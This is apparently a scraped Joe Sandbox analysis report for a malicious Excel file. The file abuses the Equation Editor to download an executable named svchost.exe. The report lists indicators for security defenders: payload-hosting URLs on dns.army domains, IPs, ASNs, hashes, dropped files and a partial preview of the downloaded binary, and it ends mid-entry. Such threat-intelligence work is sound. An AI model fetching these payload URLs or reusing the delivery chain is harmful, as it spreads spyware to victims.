                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winXLSX@6/24@5/3
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 0.3% (good quality ratio 0.1%)
                                  • Quality average: 23.7%
                                  • Quality standard deviation: 34.3%
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .xlsx
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • TCP Packets have been reduced to 100
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  12:40:08API Interceptor114x Sleep call for process: EQNEDT32.EXE modified
                                  12:40:14API Interceptor832x Sleep call for process: vbc.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  5.10.29.16978jqVxp7pl.exeGet hashmaliciousBrowse
                                    AhJ6Pqv5Ik.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.Trojan.PackedNET.598.11918.exeGet hashmaliciousBrowse
                                        179422427-105719-sanlccjavap0003-1.pdf.exeGet hashmaliciousBrowse
                                          6wYAsx4N91.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.Win32.Save.a.2641.exeGet hashmaliciousBrowse
                                              Transf. ppto 310404.xlsxGet hashmaliciousBrowse
                                                PAGO.xlsxGet hashmaliciousBrowse
                                                  104.25.234.53Pdf Document.exeGet hashmaliciousBrowse
                                                  • is.gd/TGKGYYYYZ
                                                  103.153.76.181PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • wsdysuresbonescagegp.dns.army/documenpt/svchost.exe
                                                  PAGO.xlsxGet hashmaliciousBrowse
                                                  • suresstdybonescagesc.dns.army/documenpt/svchost.exe
                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • suresstdybonescagesc.dns.army/documenpt/svchost.exe
                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • wsdysuresbonescageqa.dns.army/documenpt/svchost.exe
                                                  PRESUPUESTO .xlsxGet hashmaliciousBrowse
                                                  • surestdysbonescagexc.dns.army/documenpt/svchost.exe
                                                  PAGO.xlsxGet hashmaliciousBrowse
                                                  • surestdysbonescagexc.dns.army/documenpt/svchost.exe
                                                  Transf. ppto 310404.xlsxGet hashmaliciousBrowse
                                                  • suresstdybonestrands.dns.army/documenpt/svchost.exe?platform=hootsuite
                                                  PAGO.xlsxGet hashmaliciousBrowse
                                                  • surestdysboneinterst.dns.army/documenpt/svchost.exe
                                                  N 283.353.xlsxGet hashmaliciousBrowse
                                                  • suresbonestdyinterst.dns.army/documenpt/svchost.jpeg
                                                  justification.xlsxGet hashmaliciousBrowse
                                                  • suresb1stdyinterstpm.dns.army/receipst/winlog.exe
                                                  Fature.xlsxGet hashmaliciousBrowse
                                                  • suresb1stdyinterstpm.dns.army/receipst/winlog.exe
                                                  5678876567876.xlsxGet hashmaliciousBrowse
                                                  • wsdysuresb1interwsnt.dns.army/receipst/winlog.exe
                                                  TACSAL.xlsxGet hashmaliciousBrowse
                                                  • suresb1sndyintercont.dns.army/receipst/winlog.exe
                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • suresb1sndyintercont.dns.army/receipst/winlog.exe

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  is.gdPRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                  • 172.67.83.132
                                                  ikoAImKWvI.exeGet hashmaliciousBrowse
                                                  • 104.25.233.53
                                                  invoice.xlsxGet hashmaliciousBrowse
                                                  • 104.25.233.53
                                                  PR_A1191-04052021.xlsxGet hashmaliciousBrowse
                                                  • 104.25.233.53
                                                  Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                  • 172.67.83.132
                                                  HL-57269806 TRMER.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Updated SOA.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Statement of Account.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Shipping Documents.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Topresh_Sub2.xlsxGet hashmaliciousBrowse
                                                  • 172.67.83.132
                                                  SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.2221.rtfGet hashmaliciousBrowse
                                                  • 104.25.233.53
                                                  Proforma Invoice 2.xlsxGet hashmaliciousBrowse
                                                  • 172.67.83.132
                                                  MKDRPSJS9E999494993.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  _ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                                                  • 172.67.83.132
                                                  PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Invoice.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  smtp.lpsinvest.com78jqVxp7pl.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  wsdysuresbonescagegp.dns.armyPRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  TWIDC-AS-APTWIDCLimitedHKPRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181
                                                  xqtEOiEeHh.exeGet hashmaliciousBrowse
                                                  • 103.155.92.207
                                                  Topresh_Sub2.xlsxGet hashmaliciousBrowse
                                                  • 103.155.80.177
                                                  PAGO.xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181
                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181
                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181
                                                  PRESUPUESTO .xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181
                                                  Neworder7687689585746463.exeGet hashmaliciousBrowse
                                                  • 103.153.182.50
                                                  PAGO.xlsxGet hashmaliciousBrowse
                                                  • 103.153.76.181
                                                  Quotation Request-pdf.exeGet hashmaliciousBrowse
                                                  • 103.153.77.83
                                                  9MyoOYNXKe.exeGet hashmaliciousBrowse
                                                  • 103.155.92.70
                                                  Pictures and Catalog Attached.exeGet hashmaliciousBrowse
                                                  • 103.153.182.50
                                                  ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
                                                  • 103.155.92.70
                                                  SecuriteInfo.com.Trojan.Siggen12.47248.16606.exeGet hashmaliciousBrowse
                                                  • 103.155.92.70
                                                  AWB 9284730932.xlsxGet hashmaliciousBrowse
                                                  • 103.155.80.177
                                                  WAWASAN RUBY-AGENCY APPOINTMENT LETTER.xlsxGet hashmaliciousBrowse
                                                  • 103.155.83.195
                                                  AxR7BY4wzz.exeGet hashmaliciousBrowse
                                                  • 103.155.92.70
                                                  Payment_Advice.xlsxGet hashmaliciousBrowse
                                                  • 103.155.83.195
                                                  SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                                                  • 103.155.92.70
                                                  AWB 9284730932.xlsxGet hashmaliciousBrowse
                                                  • 103.155.80.177
                                                  EVEREST-ASGB78jqVxp7pl.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  AhJ6Pqv5Ik.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  SecuriteInfo.com.Trojan.PackedNET.598.11918.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  179422427-105719-sanlccjavap0003-1.pdf.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  6wYAsx4N91.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  SecuriteInfo.com.Trojan.Win32.Save.a.2641.exeGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  Transf. ppto 310404.xlsxGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  PAGO.xlsxGet hashmaliciousBrowse
                                                  • 5.10.29.169
                                                  CLOUDFLARENETUSPRODUCT_INQUIRY_PO_0009044_PDF.exeGet hashmaliciousBrowse
                                                  • 104.21.19.200
                                                  nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                  • 162.159.133.233
                                                  CWlXbVUJab.exeGet hashmaliciousBrowse
                                                  • 172.67.150.212
                                                  08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
                                                  • 172.67.150.212
                                                  ETL_126_072_60.docGet hashmaliciousBrowse
                                                  • 172.67.150.212
                                                  IMG_102-05_78_6.docGet hashmaliciousBrowse
                                                  • 172.67.150.212
                                                  MT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                                  • 172.67.188.154
                                                  PO4308.exeGet hashmaliciousBrowse
                                                  • 104.21.49.158
                                                  pumYguna1i.exeGet hashmaliciousBrowse
                                                  • 23.227.38.74
                                                  gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                  • 104.21.65.7
                                                  Calt7BoW2a.exeGet hashmaliciousBrowse
                                                  • 104.21.48.10
                                                  0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                  • 23.227.38.74
                                                  lfQuSBwdSf.exeGet hashmaliciousBrowse
                                                  • 172.67.188.154
                                                  TazxfJHRhq.exeGet hashmaliciousBrowse
                                                  • 23.227.38.74
                                                  AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                  • 23.227.38.74
                                                  hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                  • 172.67.219.254
                                                  RFQ-034.exeGet hashmaliciousBrowse
                                                  • 104.21.56.119
                                                  ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                  • 172.67.150.212
                                                  PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                  • 172.67.188.154
                                                  Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                  • 172.67.150.212

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  36f7277af969a6947a61ae0b815907a1PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  invoice.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  PR_A1191-04052021.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  HL-57269806 TRMER.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Updated SOA.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Statement of Account.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Shipping Documents.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Revised Proforma.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  FARASIS.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Topresh_Sub2.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.2221.rtfGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Proforma Invoice 2.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  MKDRPSJS9E999494993.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  _ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53
                                                  Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                  • 104.25.234.53

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):908800
                                                  Entropy (8bit):7.231779565509928
                                                  Encrypted:false
                                                  SSDEEP:12288:SSLIIK2eESKnuHOvMUUzui2KrbCR4MzRBMuWRTIv/YLOn8gsIKUvE+:SSEIVfuuU/zbCxz4FYwankIc
                                                  MD5:F31B0E7D038ED9D64BE2C6EF94FA5171
                                                  SHA1:A4311EA256FB28FA7815249F43C903641C7114DA
                                                  SHA-256:30865D42D9897A6611DF8683BC041836794CF6D7EE47763281FBED0F063A7C8E
                                                  SHA-512:45C21E3BF159C80ED6978A92134397074CAFEC0E5239660C5C691EF3769764209922FEC772612C61E12D45A3C157E69264C3BCD89D3CD1EC142778E42B76DE01
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Reputation:low
                                                  IE Cache URL:http://wsdysuresbonescagegp.dns.army/documenpt/svchost.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.n`..............P......F........... ........@.. .......................@............@.................................H...O.......4B................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...4B.......D..................@..@.reloc....... ......................@..B................|.......H........?..`H..............h,...........................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....ol...('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3F6ihf[1].htm
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5
                                                  Entropy (8bit):1.5219280948873621
                                                  Encrypted:false
                                                  SSDEEP:3:hn:h
                                                  MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                  SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                  SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                  SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview: 0....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1015AEA3.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                  Category:dropped
                                                  Size (bytes):14198
                                                  Entropy (8bit):7.916688725116637
                                                  Encrypted:false
                                                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF57FF8.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10715
                                                  Entropy (8bit):7.414910193109876
                                                  Encrypted:false
                                                  SSDEEP:192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
                                                  MD5:FE450E7017E0F21A25701C4ABC68021B
                                                  SHA1:06090A749D7077371AFBB5DC698C60FE861B676E
                                                  SHA-256:B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
                                                  SHA-512:815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: .PNG........IHDR..............c......sBIT....|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....|..J @....... @..............?..... @......,^..O}..|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41D443A9.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
                                                  Category:dropped
                                                  Size (bytes):7934
                                                  Entropy (8bit):7.877426792469052
                                                  Encrypted:false
                                                  SSDEEP:192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
                                                  MD5:BBACB9E08630847C0E6E84B5100C40C3
                                                  SHA1:FDE4F15306F56139583ECB5E0EC99884A3F32371
                                                  SHA-256:79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
                                                  SHA-512:E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ......JFIF.............C....................................................................C.......................................................................|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P*...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX*.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)"...*. ...t}[...}.p......._.H...w...iG..D.....9......{..}*.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4890E2DA.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
                                                  Category:dropped
                                                  Size (bytes):3455
                                                  Entropy (8bit):7.774304410172069
                                                  Encrypted:false
                                                  SSDEEP:96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
                                                  MD5:B6EE1614D1302AD75B751F7134E57AA8
                                                  SHA1:CD0071E2B61C622CFA38FACE83826A42CD6F7116
                                                  SHA-256:6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
                                                  SHA-512:849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
                                                  Malicious:false
                                                  Preview: ......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B3408F0.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):3659592
                                                  Entropy (8bit):1.0022313728649812
                                                  Encrypted:false
                                                  SSDEEP:6144:YFPAuIU4U9tVvfJHGCOd+FPAuIU4U9tVvfJHGCOd2:YmIvhGJd+mIvhGJd2
                                                  MD5:737130889222DA6A24DB863283F9AA2B
                                                  SHA1:91A31F3169BCDC0CBFC1F47E75AABDA68C764DA0
                                                  SHA-256:7B23C702859098656105259373C4A99936AEFF58064521496320532F23BE4772
                                                  SHA-512:C2B7A34156164DD7E18E9CE206BCAF8324A9B545E035A14145CE98EF7D94664816676DF0E62DE31E0A6604EEAF7B036C3DCD59223ABF3DCB35EFC42EEF108FD9
                                                  Malicious:false
                                                  Preview: ....l...............\...............dS.. EMF....H.7.....................V...........................fZ..U"..F...4...(...GDIC........l..u....................i...........................................i...A. ...]...............(.......].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E7712AA.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):51166
                                                  Entropy (8bit):7.767050944061069
                                                  Encrypted:false
                                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\696809D7.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):79394
                                                  Entropy (8bit):7.864111100215953
                                                  Encrypted:false
                                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                  MD5:16925690E9B366EA60B610F517789AF1
                                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                  Malicious:false
                                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CA41431.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):2524
                                                  Entropy (8bit):2.432470869927175
                                                  Encrypted:false
                                                  SSDEEP:24:YhtvbugwHK0a2oj7fPIgzsyFxLFeLtNFIqBtMXvuYlHek:0/wH0YmssiLUXvL+k
                                                  MD5:82550B3A28A0D1C1AD06AEF24EE0515D
                                                  SHA1:8F9CCD7419EF634E9C0479C51ECD841B4527EB3A
